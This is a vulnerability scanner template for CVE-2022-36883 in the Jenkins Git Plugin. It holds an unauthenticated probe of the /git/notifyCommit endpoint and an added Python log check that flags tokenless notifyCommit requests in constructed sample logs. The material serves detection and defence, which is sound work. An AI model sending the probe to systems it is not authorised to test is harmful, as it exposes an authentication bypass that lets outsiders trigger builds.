Vulnerability Description
A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
id: CVE-2022-36883

info:
  name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
  author: c-sh0
  severity: high
  verified: true
  description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
  reference:
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
  tags: cve,cve2022,jenkins,git,auth-bypass
  created: 2023/10/10

set:
  randstr: randomLowercase(32)
rules:
  r0:
    request:
      method: GET
      path: /git/notifyCommit?url={{randstr}}&branches={{randstr}}
    expression: response.status == 200 && response.body.bcontains(b'repository:') && response.body.bcontains(b'SCM API plugin')
expression: r0()
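
Added example (not part of the original template or of the Jenkins project's code): a defender-side log check for the endpoint the rule above probes, listing accepted /git/notifyCommit requests that carried no access token. It assumes reverse-proxy access logs in Combined Log Format, the `sha1` query parameter from the Git plugin's notifyCommit documentation, and the `token` parameter that the fixed plugin release requires per the Jenkins advisory linked above; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def notify_commit_hits(lines):
    """Return accepted (2xx) /git/notifyCommit requests that carried no token."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # Jenkins may sit under a context path, so match on the path suffix.
        if not parts.path.rstrip("/").endswith("/git/notifyCommit"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        # Assumption: a legitimate hook on a fixed plugin sends a non-empty token.
        if not m["status"].startswith("2") or query.get("token", [""])[0]:
            continue
        hits.append({
            "ip": m["ip"],
            "url": query.get("url", [""])[0],            # repository named by the caller
            "branches": query.get("branches", [""])[0],
            "sha1": query.get("sha1", [""])[0],          # commit named by the caller
        })
    return hits

# Constructed sample lines (not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2023:10:00:01 +0000] "GET /git/notifyCommit?url=abcd&branches=abcd HTTP/1.1" 200 120 "-" "scanner"',
    '192.0.2.10 - - [10/Oct/2023:10:00:05 +0000] "GET /git/notifyCommit?url=https://git.example/repo.git&token=PLACEHOLDER HTTP/1.1" 200 98 "-" "git-hook"',
    '198.51.100.7 - - [10/Oct/2023:10:00:09 +0000] "GET /git/notifyCommit?url=abcd HTTP/1.1" 401 0 "-" "-"',
    '192.0.2.33 - - [10/Oct/2023:10:01:12 +0000] "GET /jenkins/git/notifyCommit?url=https://git.example/x.git&sha1=0123abcd HTTP/1.1" 200 110 "-" "curl"',
    '192.0.2.10 - - [10/Oct/2023:10:02:00 +0000] "GET /job/app/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in notify_commit_hits(SAMPLE):
        print(hit)
```

Each hit is worth correlating with the build history of jobs whose configured repository matches the logged `url` value.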